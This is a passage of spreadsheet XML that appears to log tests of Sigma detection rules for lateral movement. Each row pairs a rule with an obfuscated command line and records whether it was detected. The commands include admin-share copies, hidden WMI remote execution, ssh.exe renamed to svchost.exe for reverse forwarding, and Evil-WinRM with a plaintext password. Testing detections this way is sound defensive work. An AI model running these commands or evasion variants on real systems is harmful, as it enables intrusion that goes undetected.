          <t>cmd.exe -"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F109" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G109" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H109" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I109" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J109" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K109" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="110" ht="15.75" customHeight="1" s="42">
      <c r="A110" s="43" t="n"/>
      <c r="B110" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C110" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D110" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E110" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F110" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G110" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H110" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I110" s="36" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J110" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K110" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="111" ht="15.75" customHeight="1" s="42">
      <c r="A111" s="43" t="n"/>
      <c r="B111" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C111" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D111" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E111" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F111" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G111" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H111" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I111" s="36" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J111" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K111" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="43" t="n"/>
      <c r="B112" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C112" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D112" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E112" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F112" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G112" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H112" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I112" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J112" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K112" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="113" ht="15.75" customHeight="1" s="42">
      <c r="A113" s="43" t="n"/>
      <c r="B113" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C113" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D113" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E113" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaND "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F113" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G113" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H113" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I113" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J113" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K113" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="114" ht="15.75" customHeight="1" s="42">
      <c r="A114" s="43" t="n"/>
      <c r="B114" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C114" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D114" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E114" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F114" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G114" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H114" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I114" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J114" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K114" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="43" t="n"/>
      <c r="B115" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C115" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D115" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E115" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -commAND "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F115" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G115" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H115" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I115" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J115" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K115" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="116" ht="15.75" customHeight="1" s="42">
      <c r="A116" s="43" t="n"/>
      <c r="B116" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C116" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D116" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E116" s="36" t="inlineStr">
        <is>
          <t>powershell -NoPRofILE -comMand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F116" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G116" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H116" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I116" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J116" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K116" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="117" ht="15.75" customHeight="1" s="42">
      <c r="A117" s="43" t="n"/>
      <c r="B117" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C117" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D117" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E117" s="36" t="inlineStr">
        <is>
          <t>powershell -nOPrOFiLE -c "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F117" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G117" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H117" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I117" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J117" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K117" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="118" ht="15.75" customHeight="1" s="42">
      <c r="A118" s="36" t="n"/>
      <c r="B118" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C118" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D118" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E118" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfILe -cOmmand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F118" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G118" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H118" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I118" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J118" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K118" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="119" ht="15.75" customHeight="1" s="42">
      <c r="A119" s="36" t="n"/>
      <c r="B119" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C119" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D119" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E119" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -COmMANd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F119" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I119" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J119" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K119" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="120" ht="15.75" customHeight="1" s="42">
      <c r="A120" s="36" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B120" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C120" s="36" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D120" s="36" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E120" s="36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F120" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G120" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H120" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I120" s="43" t="n"/>
      <c r="J120" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K120" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="121" ht="15.75" customHeight="1" s="42">
      <c r="A121" s="36" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B121" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C121" s="36" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D121" s="36" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E121" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -WiNdoWsTYle Hidden -c "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F121" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G121" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H121" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I121" s="43" t="n"/>
      <c r="J121" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K121" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="122" ht="15.75" customHeight="1" s="42">
      <c r="A122" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B122" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C122" s="43" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D122" s="43" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E122" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop -WINdowstyle Hidden -c "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F122" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G122" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H122" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I122" s="43" t="n"/>
      <c r="J122" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K122" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="123" ht="15.75" customHeight="1" s="42">
      <c r="A123" s="36" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B123" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C123" s="36" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D123" s="36" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E123" s="36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F123" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G123" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H123" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I123" s="43" t="n"/>
      <c r="J123" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K123" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="124" ht="15.75" customHeight="1" s="42">
      <c r="A124" s="36" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B124" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C124" s="36" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D124" s="36" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E124" s="36" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe /Embedding</t>
        </is>
      </c>
      <c r="F124" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G124" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H124" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I124" s="43" t="n"/>
      <c r="J124" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K124" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="125" ht="15.75" customHeight="1" s="42">
      <c r="A125" s="36" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B125" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C125" s="36" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D125" s="36" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E125" s="36" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe "-Embedding"</t>
        </is>
      </c>
      <c r="F125" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G125" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H125" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I125" s="36" t="n"/>
      <c r="J125" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K125" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="126" ht="15.75" customHeight="1" s="42">
      <c r="A126" s="36" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B126" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C126" s="36" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D126" s="36" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E126" s="36" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe -Embed""ding</t>
        </is>
      </c>
      <c r="F126" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G126" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H126" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I126" s="36" t="n"/>
      <c r="J126" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K126" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="127" ht="15.75" customHeight="1" s="42">
      <c r="A127" s="36" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B127" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C127" s="36" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D127" s="36" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E127" s="36" t="inlineStr">
        <is>
          <t>ssh.exe -F ssh_config_with_forwarding.txt user@target</t>
        </is>
      </c>
      <c r="F127" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G127" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H127" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I127" s="36" t="n"/>
      <c r="J127" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K127" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="128" ht="15.75" customHeight="1" s="42">
      <c r="A128" s="43" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B128" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C128" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D128" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E128" s="43" t="inlineStr">
        <is>
          <t>ssh.exe -o "RemoteForward 8080 localhost:80" user@10.10.10.10</t>
        </is>
      </c>
      <c r="F128" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G128" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H128" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I128" s="43" t="n"/>
      <c r="J128" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K128" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="129" ht="15.75" customHeight="1" s="42">
      <c r="A129" s="36" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B129" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C129" s="36" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D129" s="36" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E129" s="43" t="inlineStr">
        <is>
          <t>ssh.exe -R8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F129" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G129" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H129" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I129" s="43" t="n"/>
      <c r="J129" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K129" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="130" ht="15.75" customHeight="1" s="42">
      <c r="A130" s="43" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B130" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C130" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D130" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E130" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -R 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F130" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G130" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H130" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I130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0" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K130" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="36" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B131" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C131" s="36" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D131" s="36" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E131" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -r 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F131" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G131" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H131" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I131" s="36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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K131" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="132" ht="15.75" customHeight="1" s="42">
      <c r="A132" s="43" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B132" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C132" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D132" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E132" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe /"R" 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F132" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G132" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H132" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I132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2" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K132" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="133" ht="15.75" customHeight="1" s="42">
      <c r="A133" s="36" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B133" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C133" s="36" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D133" s="36" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E133" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -"R" 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F133" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G133" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H133" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I133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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K133" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="134" ht="15.75" customHeight="1" s="42">
      <c r="A134" s="36" t="inlineStr">
        <is>
          <t>t1021.006</t>
        </is>
      </c>
      <c r="B134" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_evil_winrm</t>
        </is>
      </c>
      <c r="C134" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinRM Access Via Evil-WinRM</t>
        </is>
      </c>
      <c r="D134" s="36" t="inlineStr">
        <is>
          <t>a197e378-d31b-41c0-9635-cfdf1c1bb423</t>
        </is>
      </c>
      <c r="E134" s="36" t="inlineStr">
        <is>
          <t>copy C:\Ruby30-x64\bin\ruby.exe C:\temp\updater.exe &amp;&amp; C:\temp\updater.exe evil-winrm.rb -i 10.0.0.5 -u Administrator -p Password123</t>
        </is>
      </c>
      <c r="F134" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G134" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H134" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I134" s="36" t="inlineStr">
        <is>
          <t>Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4)</t>
        </is>
      </c>
      <c r="J134" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K134" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="135" ht="15.75" customHeight="1" s="42">
      <c r="A135" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B135" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C135" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D135" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E135" s="36" t="inlineStr">
        <is>
